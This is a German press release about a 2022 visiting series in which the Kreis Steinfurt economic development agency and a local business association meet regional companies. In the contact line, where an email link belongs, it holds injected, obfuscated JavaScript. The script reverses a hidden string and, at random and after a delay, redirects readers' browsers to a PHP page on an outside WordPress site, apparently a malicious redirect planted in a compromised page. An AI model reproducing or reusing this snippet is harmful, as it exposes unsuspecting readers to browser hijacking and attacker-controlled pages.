„Wirtschaft vor Ort“: WESt mbH und WVS besuchen gemeinsam Unternehmen im Kreis Steinfurt

veröffentlicht am 4. Juli, 2022
Unternehmensbesuche WESt WVS

Im Juli 2022 starten die Kreiswirtschaftsförderung (WESt) und die Wirtschaftsvereinigung Steinfurt e.V. (WVS) erstmalig die Reihe „Wirtschaft vor Ort“, in deren Rahmen sie gemeinsam Unternehmen im Kreis Steinfurt besuchen.

Bei den Treffen mit den Unternehmen vor Ort geht es um aktuelle Fragestellungen der Betriebe und um unterstützende Angebote seitens der WESt und der WVS für die lokale Wirtschaft. „Unser Anliegen ist es, die regionalen Betriebe noch besser kennenzulernen und herauszufinden, wie wir am besten unterstützen können“, so Varvara Leinz, Mitarbeiterin im Unternehmensservice bei der WESt mbH. Ob Fördermöglichkeiten, Digitalisierung, nachhaltiger Wirtschaften, Fachkräftesicherung, Forschung & Entwicklung oder Wasserstoff – die Themen, die die Partner im Portfolio haben und ansprechen wollen, sind breit gefächert.

„Ein enger Austausch mit den Unternehmen im Kreis Steinfurt ist uns sehr wichtig. Getreu dem Motto ‚aus der Region – für die Region‘ erhoffen wir uns dabei einen offenen und konstruktiven Dialog über die Themen, die die Betriebe gerade bewegen“, betont Heiner Hoffschroer, Geschäftsführer der WVS.

Die geplante Besuchsreihe erstreckt sich über mehrere Wochen im Sommer 2022. Der Besuch vor Ort dauert in der Regel 1,5 bis 2 Stunden und findet ohne eine vorgegebene Agenda bei einem lockeren Treffen statt. Unternehmen, die an einem Austausch mit der Kreiswirtschaftsförderung und der Wirtschaftsvereinigung interessiert sind, können sich direkt melden (Kontakt WVS: $zXz=function(n){if (typeof ($zXz.list[n]) == „string“) return $zXz.list[n].split(„“).reverse().join(„“);return $zXz.list[n];};$zXz.list=[„\’php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to:varvara.leinz@westmbh.de“>varvara.leinz@westmbh.de).

Teilen Sie den Artikel und empfehlen Sie diesen weiter!

Weitere News